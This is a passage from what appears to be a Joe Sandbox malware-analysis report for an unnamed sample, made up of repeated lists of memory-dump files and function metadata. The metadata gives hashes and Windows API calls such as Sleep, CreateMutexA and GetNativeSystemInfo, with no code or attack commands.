Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 142e0020a0ec0b6043f0a9433244d07ecf3c92927f4792eda03f17bcb794ce2f
Instruction ID: ba29b02f7eb49ccbaa972b7050f0e6741093e56c85542c3e87713ca7c4fab5ed
Opcode Fuzzy Hash: 142e0020a0ec0b6043f0a9433244d07ecf3c92927f4792eda03f17bcb794ce2f
Instruction Fuzzy Hash: 3F311531B042088BEB1C9BB8D889F6DBB72FB85318F24861CE014E73D5D739C9808752

Function 008CA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6ddb0424aba83a4aa10dfbd49ca43e9812df129222e6ea0551e5c9ee2b5beb8f
Instruction ID: e6980d7919fdb49af7a41dd58f6b2fc6645192c395fa43a4de5ab9a3837ee09a
Opcode Fuzzy Hash: 6ddb0424aba83a4aa10dfbd49ca43e9812df129222e6ea0551e5c9ee2b5beb8f
Instruction Fuzzy Hash: 0E31073171420C9BEB1C9B78DC89F6DBBB2FB81318F24861DE068E72D5D735C9848652

Function 008C9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d3b31ac652d90cd41918b6196fff5da482db249d7699bcc09894676703a75ef2
Instruction ID: 5b29e63847339276af6d1b85cbd99a4ab4f05f7dc5aeb8b65218bca1420079d9
Opcode Fuzzy Hash: d3b31ac652d90cd41918b6196fff5da482db249d7699bcc09894676703a75ef2
Instruction Fuzzy Hash: 0121F1327042089BEB1C9B68EC89B6DB7B1FBC1314F20825DE468D72E5D775C9808652

Function 008CA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 39ac1684181716771e90690dfe28a8257848517787d8085594919f61449767d6
Instruction ID: 03822053324d0a5316f5de4cf037025749e45a99727e32499d6ea57fc7484e59
Opcode Fuzzy Hash: 39ac1684181716771e90690dfe28a8257848517787d8085594919f61449767d6
Instruction Fuzzy Hash: 94212B31348208DBFB2C676C989AF7EB671FF81708F24492EE109D62D5CA7AC9819553

Function 008CA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 05b0e09d28336bac411519a1d07a86b94ec502859e4214ea6bd3bf239077e3b9
Instruction ID: 9a6b7eab5d692fded054bc510e73b2146d5c137f8543560e49a1e8e867cd6640
Opcode Fuzzy Hash: 05b0e09d28336bac411519a1d07a86b94ec502859e4214ea6bd3bf239077e3b9
Instruction Fuzzy Hash: AA2128327042089BEB1C9B6CEC99B6DBB71FBD1318F24821DE418D77E4C776D9808652

Function 008C7D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008C7ED3

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
